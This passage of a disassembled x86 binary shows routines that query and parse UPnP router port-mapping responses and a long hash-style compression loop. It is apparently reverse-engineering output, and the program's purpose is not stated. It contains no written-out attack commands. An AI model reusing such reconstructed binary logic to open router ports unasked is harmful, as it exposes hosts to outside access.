call sub_9B51E3
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B57C9
mov edi, [ebp+arg_1C]
cmp edi, ebx
jz short loc_9B57C9
push 50h ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+4Fh], bl
loc_9B57C9: ; CODE XREF: sub_9B5636+17E�j
; sub_9B5636+185�j
lea eax, [ebp+var_4C]
push offset aNewleasedurati ; "NewLeaseDuration"
push eax ; int
call sub_9B51E3
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B57F0
mov edi, [ebp+arg_28]
cmp edi, ebx
jz short loc_9B57F0
push 10h ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+0Fh], bl
loc_9B57F0: ; CODE XREF: sub_9B5636+1A5�j
; sub_9B5636+1AC�j
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B51E3
cmp eax, ebx
pop ecx
pop ecx
pop edi
jz short loc_9B581C
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
loc_9B581C: ; CODE XREF: sub_9B5636+1CD�j
lea eax, [ebp+var_4C]
push eax
call sub_9B51B9
push [ebp+Memory] ; Memory
call free
mov eax, [ebp+var_4]
pop ecx
pop ecx
loc_9B5833: ; CODE XREF: sub_9B5636+26�j
pop esi
pop ebx
leave
retn
sub_9B5636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5837(char *Str, int, int, int, char *Dest, int)
sub_9B5837 proc near ; CODE XREF: sub_9A932E+F8�p
var_104C = dword ptr -104Ch
var_4C = dword ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Dest = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+arg_14], 0
push ebx
push edi
mov [ebp+var_8], 1000h
jz loc_9B5979
cmp [ebp+Dest], 0
jz loc_9B5979
mov ebx, [ebp+arg_8]
test ebx, ebx
jz loc_9B5979
mov edi, [ebp+arg_C]
test edi, edi
jz loc_9B5979
push esi
push 8 ; SizeOfElements
push 4 ; NumOfElements
call calloc
mov esi, eax
lea eax, [ebp+var_8]
push eax ; int
lea eax, [ebp+var_104C]
push eax ; int
push esi ; int
push offset aGetspecificpor ; "GetSpecificPortMappingEntry"
push [ebp+arg_4] ; int
mov dword ptr [esi], offset aNewremotehost ; "NewRemoteHost"
push [ebp+Str] ; Str
mov dword ptr [esi+8], offset aNewexternalpor ; "NewExternalPort"
push 0FFFFFFFFh ; s
mov [esi+0Ch], ebx
mov dword ptr [esi+10h], offset aNewprotocol ; "NewProtocol"
mov [esi+14h], edi
call sub_9B4C5A
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B517D
lea eax, [ebp+var_4C]
push offset aNewinternalcli ; "NewInternalClient"
push eax ; int
call sub_9B51E3
mov edi, strncpy
add esp, 38h
test eax, eax
jz short loc_9B5904
mov ebx, [ebp+Dest]
push 10h ; Count
push eax ; Source
push ebx ; Dest
call edi ; strncpy
add esp, 0Ch
and [ebp+var_4], 0
mov byte ptr [ebx+0Fh], 0
jmp short loc_9B590A
; ---------------------------------------------------------------------------
loc_9B5904: ; CODE XREF: sub_9B5837+B5�j
mov eax, [ebp+Dest]
mov byte ptr [eax], 0
loc_9B590A: ; CODE XREF: sub_9B5837+CB�j
lea eax, [ebp+var_4C]
push offset aNewinternalpor ; "NewInternalPort"
push eax ; int
call sub_9B51E3
test eax, eax
pop ecx
pop ecx
jz short loc_9B5930
mov ebx, [ebp+arg_14]
push 6 ; Count
push eax ; Source
push ebx ; Dest
call edi ; strncpy
add esp, 0Ch
mov byte ptr [ebx+5], 0
jmp short loc_9B5936
; ---------------------------------------------------------------------------
loc_9B5930: ; CODE XREF: sub_9B5837+E5�j
mov eax, [ebp+arg_14]
mov byte ptr [eax], 0
loc_9B5936: ; CODE XREF: sub_9B5837+F7�j
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B51E3
test eax, eax
pop ecx
pop ecx
jz short loc_9B5961
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
loc_9B5961: ; CODE XREF: sub_9B5837+111�j
lea eax, [ebp+var_4C]
push eax
call sub_9B51B9
push esi ; Memory
call free
mov eax, [ebp+var_4]
pop ecx
pop ecx
pop esi
jmp short loc_9B597C
; ---------------------------------------------------------------------------
loc_9B5979: ; CODE XREF: sub_9B5837+1E�j
; sub_9B5837+28�j ...
push 0FFFFFFFEh
pop eax
loc_9B597C: ; CODE XREF: sub_9B5837+140�j
pop edi
pop ebx
leave
retn
sub_9B5837 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5980(int, int, void *Dst)
sub_9B5980 proc near ; CODE XREF: sub_9AE331+3A�p
; sub_9AE331+A7�p
var_3C98 = dword ptr -3C98h
Src = byte ptr -3C90h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Dst = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 3C98h
call __alloca_probe
lea eax, [ebp+var_3C98]
push 200h ; int
push eax ; Dst
call sub_9B6665
mov eax, [ebp+arg_4]
push 8
pop ecx
mul ecx
push edx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_3C98]
push eax
call sub_9B6942
lea eax, [ebp+var_3C98]
push 0 ; Dst
push eax ; int
call sub_9B6BB5
push 40h ; Size
lea eax, [ebp+Src]
push eax ; Src
push [ebp+Dst] ; Dst
call memcpy
add esp, 2Ch
leave
retn
sub_9B5980 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B59DB proc near ; CODE XREF: sub_9B6193+63�p
var_54 = dword ptr -54h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
mov ecx, [ebp+arg_4]
shl ecx, 4
test ecx, ecx
mov [ebp+var_C], 89ABCDEFh
mov [ebp+var_8], 1234567h
jle locret_9B6191
mov eax, [ebp+arg_0]
add eax, 1D0h
dec ecx
push ebx
shr ecx, 4
inc ecx
push esi
mov [ebp+var_4], ecx
push edi
loc_9B5A10: ; CODE XREF: sub_9B59DB+7AD�j
mov edi, [eax+50h]
mov ebx, [eax+68h]
mov esi, [eax+54h]
mov edx, [eax-11Ch]
and edx, [eax+4]
and ebx, edi
mov ecx, [eax-120h]
and ecx, [eax]
mov edi, [eax+6Ch]
xor ecx, ebx
xor ecx, [eax-1D0h]
and edi, esi
xor edx, edi
xor edx, [eax-1CCh]
mov esi, [eax+70h]
xor edx, [eax+74h]
xor ecx, esi
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Ah
xor ecx, edi
shr ebx, 0Ah
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Bh
xor ebx, edx
mov edx, [eax-114h]
and edx, [eax+0Ch]
shl edi, 0Bh
xor edi, ecx
mov ecx, [eax-118h]
and ecx, [eax+8]
mov [eax+0FCh], ebx
mov ebx, [eax+58h]
and esi, ebx
mov ebx, [eax+74h]
mov [eax+0F8h], edi
mov edi, [eax+5Ch]
and ebx, edi
xor edx, ebx
xor edx, [eax-1C4h]
xor ecx, esi
xor ecx, [eax-1C8h]
mov esi, [eax+7Ch]
xor ecx, [eax+78h]
xor edx, esi
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 5
xor ecx, edi
shr ebx, 5
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 18h
shl edi, 18h
xor edi, ecx
xor ebx, edx
mov edx, [eax-10Ch]
and edx, [eax+14h]
lea ecx, [eax+80h]
mov [ebp+arg_4], ecx
mov ecx, [eax-110h]
and ecx, [eax+10h]
mov [eax+100h], edi
mov edi, [eax+60h]
and edi, [eax+78h]
mov [eax+104h], ebx
mov ebx, [eax+64h]
and ebx, esi
mov esi, [ebp+arg_4]
xor ecx, edi
xor ecx, [eax-1C0h]
mov edi, [esi]
xor edx, ebx
xor edx, [eax-1BCh]
mov esi, [esi+4]
xor ecx, edi
xor ecx, [ebp+var_C]
xor edx, esi
xor edx, [ebp+var_8]
mov [ebp+var_30], esi
mov esi, ecx
mov ebx, edx
shrd esi, ebx, 0Dh
xor ecx, esi
shr ebx, 0Dh
xor edx, ebx
mov esi, ecx
mov ebx, edx
shld ebx, esi, 9
xor ebx, edx
mov edx, [eax-104h]
and edx, [eax+1Ch]
shl esi, 9
xor esi, ecx
mov ecx, [eax-108h]
and ecx, [eax+18h]
mov [eax+108h], esi
mov esi, [eax+68h]
and esi, edi
mov edi, [eax+6Ch]
and edi, [ebp+var_30]
xor ecx, esi
xor ecx, [eax-1B8h]
mov esi, [eax+88h]
xor edx, edi
xor edx, [eax-1B4h]
xor ecx, esi
xor edx, [eax+8Ch]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov [eax+10Ch], ebx
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Ah
xor ecx, edi
shr ebx, 0Ah
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 10h
shl edi, 10h
xor edi, ecx
mov ecx, [eax-100h]
and ecx, [eax+20h]
xor ebx, edx
mov edx, [eax-0FCh]
and edx, [eax+24h]
mov [eax+110h], edi
mov edi, [eax+70h]
and edi, esi
mov esi, [eax+74h]
and esi, [eax+8Ch]
xor ecx, edi
xor ecx, [eax-1B0h]
xor edx, esi
xor edx, [eax-1ACh]
mov esi, [eax+90h]
xor edx, [eax+94h]
xor ecx, esi
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov [eax+114h], ebx
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Bh
shr ebx, 0Bh
xor ecx, edi
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Fh
shl edi, 0Fh
xor edi, ecx
xor ebx, edx
mov [eax+118h], edi
mov edx, [eax-0F4h]
and edx, [eax+2Ch]
mov edi, [eax+94h]
and edi, [eax+7Ch]
mov ecx, [eax-0F8h]
and ecx, [eax+28h]
and esi, [eax+78h]
xor edx, edi
xor edx, [eax-1A4h]
xor ecx, esi
xor ecx, [eax-1A8h]
xor edx, [eax+9Ch]
mov esi, [eax+98h]
xor edx, [ebp+var_8]
xor ecx, esi
xor ecx, [ebp+var_C]
mov [eax+11Ch], ebx
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Ch
xor ecx, edi
shr ebx, 0Ch
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 9
xor ebx, edx
mov edx, [eax-0ECh]
and edx, [eax+34h]
shl edi, 9
xor edi, ecx
mov ecx, [eax-0F0h]
and ecx, [eax+30h]
mov [eax+124h], ebx
mov ebx, [ebp+arg_4]
mov [eax+120h], edi
mov edi, esi
and edi, [ebx]
mov ebx, [eax+9Ch]
and ebx, [ebp+var_30]
xor ecx, edi
xor ecx, [eax-1A0h]
xor edx, ebx
xor edx, [eax-19Ch]
xor ecx, [eax+0A0h]
xor edx, [eax+0A4h]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 2
xor ecx, edi
shr ebx, 2
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 1Bh
xor ebx, edx
mov edx, [eax-0E4h]
and edx, [eax+3Ch]
shl edi, 1Bh
xor edi, ecx
mov ecx, [eax-0E8h]
and ecx, [eax+38h]
mov [eax+128h], edi
mov edi, [eax+0A0h]
and edi, [eax+88h]
mov [eax+12Ch], ebx
mov ebx, [eax+0A4h]
and ebx, [eax+8Ch]
xor ecx, edi
xor ecx, [eax-198h]
xor edx, ebx
xor edx, [eax-194h]
xor ecx, [eax+0A8h]
xor edx, [eax+0ACh]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 7
xor ecx, edi
shr ebx, 7
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Fh
xor ebx, edx
mov edx, [eax-0DCh]
and edx, [eax+44h]
shl edi, 0Fh
xor edi, ecx
mov ecx, [eax+0B0h]
mov [ebp+var_14], ecx
mov ecx, [eax+0B4h]
mov [ebp+var_10], ecx
mov ecx, [eax-0E0h]
and ecx, [eax+40h]
mov [eax+130h], edi
mov edi, [eax+0A8h]
and edi, [eax+90h]
mov [eax+134h], ebx
mov ebx, [eax+0ACh]
and ebx, [eax+94h]
xor ecx, edi
xor ecx, [eax-190h]
xor edx, ebx
xor edx, [eax-18Ch]
xor ecx, [ebp+var_14]
xor edx, [ebp+var_10]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Eh
xor ecx, edi
shr ebx, 0Eh
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 6
shl edi, 6
xor edi, ecx
mov ecx, [eax-0D8h]
and ecx, [eax+48h]
xor ebx, edx
mov edx, [eax-0D4h]
and edx, [eax+4Ch]
mov [eax+138h], edi
mov edi, [ebp+var_14]
and edi, esi
mov esi, [ebp+var_10]
and esi, [eax+9Ch]
xor ecx, edi
xor ecx, [eax-188h]
xor edx, esi
xor edx, [eax-184h]
xor ecx, [eax+0B8h]
xor edx, [eax+0BCh]
xor ecx, [ebp+var_C]
mov esi, [ebp+var_8]
mov [eax+13Ch], ebx
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Fh
xor ecx, edi
shr ebx, 0Fh
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 2
shl edi, 2
xor edi, ecx
mov ecx, [eax-0D0h]
and ecx, [eax+50h]
xor ebx, edx
mov edx, [eax-0CCh]
and edx, [eax+54h]
mov [eax+140h], edi
mov edi, [eax+0B8h]
mov [eax+144h], ebx
and edi, [eax+0A0h]
mov ebx, [eax+0BCh]
and ebx, [eax+0A4h]
xor ecx, edi
xor ecx, [eax-180h]
xor edx, ebx
xor edx, [eax-17Ch]
xor ecx, [eax+0C0h]
xor edx, [eax+0C4h]
xor ecx, [ebp+var_C]
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 7
xor ecx, edi
shr ebx, 7
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 1Dh
xor ebx, edx
mov edx, [eax-0C4h]
and edx, [eax+5Ch]
shl edi, 1Dh
xor edi, ecx
mov ecx, [eax-0C8h]
and ecx, [eax+58h]
mov [eax+148h], edi
mov edi, [eax+0C0h]
and edi, [eax+0A8h]
mov [eax+14Ch], ebx
mov ebx, [eax+0C4h]
and ebx, [eax+0ACh]
xor ecx, edi
xor ecx, [eax-178h]
xor edx, ebx
xor edx, [eax-174h]
xor ecx, [eax+0C8h]
xor edx, [eax+0CCh]
xor ecx, [ebp+var_C]
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Dh
xor ecx, edi
shr ebx, 0Dh
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 8
shl edi, 8
xor edi, ecx
mov ecx, [eax+0D0h]
mov [ebp+var_1C], ecx
mov ecx, [eax+0D4h]
mov [eax+150h], edi
mov edi, [ebp+var_14]
and edi, [eax+0C8h]
xor ebx, edx
mov edx, [eax-0BCh]
and edx, [eax+64h]
mov [ebp+var_18], ecx
mov ecx, [eax-0C0h]
and ecx, [eax+60h]
mov [ebp+var_3C], edi
mov edi, [ebp+var_10]
and edi, [eax+0CCh]
xor ecx, [ebp+var_3C]
xor edx, edi
xor ecx, [eax-170h]
xor edx, [eax-16Ch]
xor ecx, [ebp+var_1C]
xor edx, [ebp+var_18]
xor ecx, [ebp+var_C]
mov [eax+154h], ebx
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Bh
shr ebx, 0Bh
xor ecx, edi
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Fh
xor ebx, edx
mov edx, [eax-0B4h]
and edx, [eax+6Ch]
shl edi, 0Fh
xor edi, ecx
mov ecx, [eax+0D8h]
mov [ebp+var_24], ecx
mov ecx, [eax+0DCh]
mov [eax+158h], edi
mov edi, [eax+0B8h]
mov [eax+15Ch], ebx
mov ebx, [ebp+var_1C]
and ebx, edi
mov edi, [ebp+var_18]
mov [ebp+var_20], ecx
mov ecx, [eax-0B8h]
and ecx, [eax+68h]
mov [ebp+var_44], ebx
xor ecx, [ebp+var_44]
mov ebx, [eax+0BCh]
xor ecx, [eax-168h]
and edi, ebx
xor ecx, [ebp+var_24]
xor edx, edi
xor edx, [eax-164h]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_20]
mov edi, ecx
xor edx, esi
mov ebx, edx
shrd edi, ebx, 7
xor ecx, edi
shr ebx, 7
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 5
xor ebx, edx
mov edx, [eax-0ACh]
and edx, [eax+74h]
shl edi, 5
xor edi, ecx
mov ecx, [eax+0E0h]
mov [eax+160h], edi
mov edi, [eax+0C0h]
mov [eax+164h], ebx
mov ebx, [ebp+var_24]
and ebx, edi
mov edi, [ebp+var_20]
mov [ebp+var_2C], ecx
mov ecx, [eax+0E4h]
mov [ebp+var_28], ecx
mov ecx, [eax-0B0h]
and ecx, [eax+70h]
mov [ebp+var_4C], ebx
xor ecx, [ebp+var_4C]
mov ebx, [eax+0C4h]
xor ecx, [eax-160h]
and edi, ebx
xor ecx, [ebp+var_2C]
xor edx, edi
xor edx, [eax-15Ch]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_28]
mov edi, ecx
xor edx, esi
mov ebx, edx
shrd edi, ebx, 6
shr ebx, 6
xor ecx, edi
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 1Fh
shl edi, 1Fh
xor edi, ecx
xor ebx, edx
mov ecx, [eax-0A8h]
and ecx, [eax+78h]
mov edx, [eax-0A4h]
and edx, [eax+7Ch]
mov [eax+168h], edi
mov edi, [eax+0C8h]
mov [eax+16Ch], ebx
mov ebx, [ebp+var_2C]
and ebx, edi
mov edi, [ebp+var_28]
mov [ebp+var_54], ebx
mov ebx, [eax+0CCh]
xor ecx, [ebp+var_54]
and edi, ebx
xor ecx, [eax-158h]
xor edx, edi
xor edx, [eax-154h]
xor ecx, [eax+0E8h]
xor edx, [eax+0ECh]
xor ecx, [ebp+var_C]
xor edx, esi
mov ebx, edx
mov edi, ecx
shrd edi, ebx, 0Ch
xor ecx, edi
shr ebx, 0Ch
xor edx, ebx
mov ebx, edx
mov edi, ecx
shld ebx, edi, 9
xor ebx, edx
shl edi, 9
xor edi, ecx
mov [eax+170h], edi
mov [eax+174h], ebx
mov eax, [ebp+var_C]
and eax, 2425CFA0h
mov edx, esi
shr edx, 1Fh
xor eax, edx
mov edx, [ebp+var_C]
mov ecx, esi
shld esi, edx, 1
and ecx, 7311C281h
xor edi, edi
shl edx, 1
xor ecx, edi
xor eax, edx
xor ecx, esi
dec [ebp+var_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_8], ecx
jnz loc_9B5A10
pop edi
pop esi
pop ebx
locret_9B6191: ; CODE XREF: sub_9B59DB+1C�j
leave
retn
sub_9B59DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B6193(int, void *Src, int, void *Val)
sub_9B6193 proc near ; CODE XREF: sub_9B6363+123�p
arg_0 = dword ptr 8
Src = dword ptr 0Ch
arg_8 = dword ptr 10h
Val = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+Src], 0
push ebx
push edi
mov edi, [ebp+Val]
mov ebx, edi
jnz short loc_9B61A7
push 9
jmp short loc_9B61AF
; ---------------------------------------------------------------------------
loc_9B61A7: ; CODE XREF: sub_9B6193+E�j
cmp [ebp+arg_0], 0
jnz short loc_9B61B5
push 0Fh
loc_9B61AF: ; CODE XREF: sub_9B6193+12�j
pop eax
jmp loc_9B623A
; ---------------------------------------------------------------------------
loc_9B61B5: ; CODE XREF: sub_9B6193+18�j
push esi
mov esi, [ebp+arg_8]
test esi, esi
jl short loc_9B6236
cmp esi, 0FFh
jg short loc_9B6236
test edi, edi
jnz short loc_9B61E6
mov eax, esi
shl eax, 4
add eax, 59h
push 8 ; SizeOfElements
push eax ; NumOfElements
call calloc
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_9B61E6
push 12h
jmp short loc_9B6238
; ---------------------------------------------------------------------------
loc_9B61E6: ; CODE XREF: sub_9B6193+34�j
; sub_9B6193+4D�j
push 2C8h ; Size
push [ebp+Src] ; Src
push edi ; Dst
call memcpy
push esi
push edi
call sub_9B59DB
shl esi, 7
push 80h ; Size
lea eax, [esi+edi+248h]
push eax ; Src
push [ebp+arg_0] ; Dst
call memcpy
add esp, 20h
test ebx, ebx
jnz short loc_9B6232
add esi, 2C8h
push esi ; Size
push ebx ; Val
push edi ; Dst
call memset
push edi ; Memory
call free
add esp, 10h
loc_9B6232: ; CODE XREF: sub_9B6193+85�j
xor eax, eax
jmp short loc_9B6239
; ---------------------------------------------------------------------------
loc_9B6236: ; CODE XREF: sub_9B6193+28�j
; sub_9B6193+30�j
push 11h
loc_9B6238: ; CODE XREF: sub_9B6193+51�j
pop eax
loc_9B6239: ; CODE XREF: sub_9B6193+A1�j
pop esi
loc_9B623A: ; CODE XREF: sub_9B6193+1D�j
pop edi
pop ebx
pop ebp
retn
sub_9B6193 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B623E proc near ; CODE XREF: sub_9B62B8+79�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cdq
shld edx, eax, 8
shl eax, 8
mov ecx, eax
mov eax, [ebp+arg_4]
push esi
mov esi, edx
cdq
or ecx, eax
mov eax, [ebp+arg_8]
or esi, edx
shld esi, ecx, 4
shl ecx, 4
cdq
or ecx, eax
mov eax, [ebp+arg_C]
or esi, edx
shld esi, ecx, 10h
shl ecx, 10h
cdq
or ecx, eax
mov eax, [ebp+arg_10]
or esi, edx
shld esi, ecx, 8
cdq
shl ecx, 8
or ecx, eax
mov eax, [ebp+arg_14]
or esi, edx
shld esi, ecx, 0Ch
cdq
shl ecx, 0Ch
or ecx, eax
or esi, edx
mov edx, esi
mov eax, ecx
pop esi
pop ebp
retn
sub_9B623E endp
; =============== S U B R O U T I N E =======================================
sub_9B629C proc near ; CODE XREF: sub_9B62B8+4C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cdq
mov ecx, eax
mov eax, [esp+arg_4]
cdq
push esi
xor esi, esi
shl ecx, 18h
or esi, eax
or ecx, edx
mov eax, esi
mov edx, ecx
pop esi
retn
sub_9B629C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B62B8 proc near ; CODE XREF: sub_9B6363+DB�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Src = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_4]
push esi
push edi
mov edi, [ebp+arg_0]
push 0Fh
pop esi
mov eax, edi
sub ecx, edi
mov [ebp+arg_0], esi
loc_9B62D0: ; CODE XREF: sub_9B62B8+2A�j
mov edx, [ecx+eax]
mov [eax], edx
mov edx, [ecx+eax+4]
mov [eax+4], edx
add eax, 8
dec [ebp+arg_0]
jnz short loc_9B62D0
mov ecx, [ebp+arg_8]
xor eax, eax
loc_9B62E9: ; CODE XREF: sub_9B62B8+44�j
mov edx, [ecx+eax*8]
mov [edi+esi*8], edx
mov edx, [ecx+eax*8+4]
mov [edi+esi*8+4], edx
inc esi
inc eax
cmp eax, 8
jl short loc_9B62E9
push [ebp+arg_10]
push [ebp+arg_C]
call sub_9B629C
mov [ebp+Src], eax
push 8 ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [edi+esi*8]
push eax ; Dst
mov [ebp+var_4], edx
call memcpy
push [ebp+arg_28]
inc esi
push [ebp+arg_24]
push [ebp+arg_20]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
call sub_9B623E
mov [ebp+var_10], eax
push 8 ; Size
lea eax, [ebp+var_10]
push eax ; Src
lea esi, [edi+esi*8]
push esi ; Dst
mov [ebp+var_C], edx
call memcpy
push 200h ; Size
push [ebp+arg_2C] ; Src
add esi, 8
push esi ; Dst
call memcpy
add esp, 44h
pop edi
pop esi
leave
retn
sub_9B62B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B6363 proc near ; CODE XREF: sub_9B66FE+BE�p
Val = byte ptr -9F08h
Src = byte ptr -2C8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
push ebp
mov ebp, esp
mov eax, 9F08h
call __alloca_probe
xor ecx, ecx
cmp [ebp+arg_0], ecx
push esi
push edi
jnz short loc_9B637D
push 0Fh
jmp short loc_9B6384
; ---------------------------------------------------------------------------
loc_9B637D: ; CODE XREF: sub_9B6363+14�j
cmp [ebp+arg_2C], ecx
jnz short loc_9B638A
push 0Ah
loc_9B6384: ; CODE XREF: sub_9B6363+18�j
pop eax
jmp loc_9B649C
; ---------------------------------------------------------------------------
loc_9B638A: ; CODE XREF: sub_9B6363+1D�j
xor edx, edx
mov eax, 0FFh
cmp [ebp+arg_14], eax
push ebx
setnle dl
xor ebx, ebx
cmp [ebp+arg_14], ecx
setl bl
or edx, ebx
jz short loc_9B63AB
push 11h
jmp loc_9B649A
; ---------------------------------------------------------------------------
loc_9B63AB: ; CODE XREF: sub_9B6363+3F�j
xor edx, edx
cmp [ebp+arg_18], eax
setnle dl
xor ebx, ebx
cmp [ebp+arg_18], ecx
setl bl
or edx, ebx
jz short loc_9B63C6
push 10h
jmp loc_9B649A
; ---------------------------------------------------------------------------
loc_9B63C6: ; CODE XREF: sub_9B6363+5A�j
mov ebx, [ebp+arg_C]
cmp ebx, ecx
jl loc_9B6498
cmp ebx, eax
jg loc_9B6498
mov edi, [ebp+arg_20]
cmp edi, ecx
jl loc_9B6494
cmp edi, 1000h
jg loc_9B6494
mov esi, [ebp+arg_28]
cmp esi, ecx
jle loc_9B6490
cmp esi, 200h
jg loc_9B6490
cmp [ebp+arg_8], ecx
jnz short loc_9B6413
push 0Dh
jmp loc_9B649A
; ---------------------------------------------------------------------------
loc_9B6413: ; CODE XREF: sub_9B6363+A7�j
cmp [ebp+arg_4], ecx
jnz short loc_9B641C
push 0Eh
jmp short loc_9B649A
; ---------------------------------------------------------------------------
loc_9B641C: ; CODE XREF: sub_9B6363+B3�j
push [ebp+arg_2C]
lea eax, [ebp+Src]
push esi
push [ebp+arg_24]
push edi
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_9B62B8
mov eax, ds:dword_9BA2E4
add esp, 30h
test eax, eax
jz short loc_9B6472
push [ebp+arg_2C]
push esi
push [ebp+arg_24]
push edi
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call eax ; dword_9BA2E4
add esp, 30h
loc_9B6472: ; CODE XREF: sub_9B6363+EA�j
lea eax, [ebp+Val]
push eax ; Val
push [ebp+arg_14] ; int
lea eax, [ebp+Src]
push eax ; Src
push [ebp+arg_0] ; int
call sub_9B6193
add esp, 10h
jmp short loc_9B649B
; ---------------------------------------------------------------------------
loc_9B6490: ; CODE XREF: sub_9B6363+92�j
; sub_9B6363+9E�j
push 2
jmp short loc_9B649A
; ---------------------------------------------------------------------------
loc_9B6494: ; CODE XREF: sub_9B6363+7B�j
; sub_9B6363+87�j
push 0Ch
jmp short loc_9B649A
; ---------------------------------------------------------------------------
loc_9B6498: ; CODE XREF: sub_9B6363+68�j
; sub_9B6363+70�j
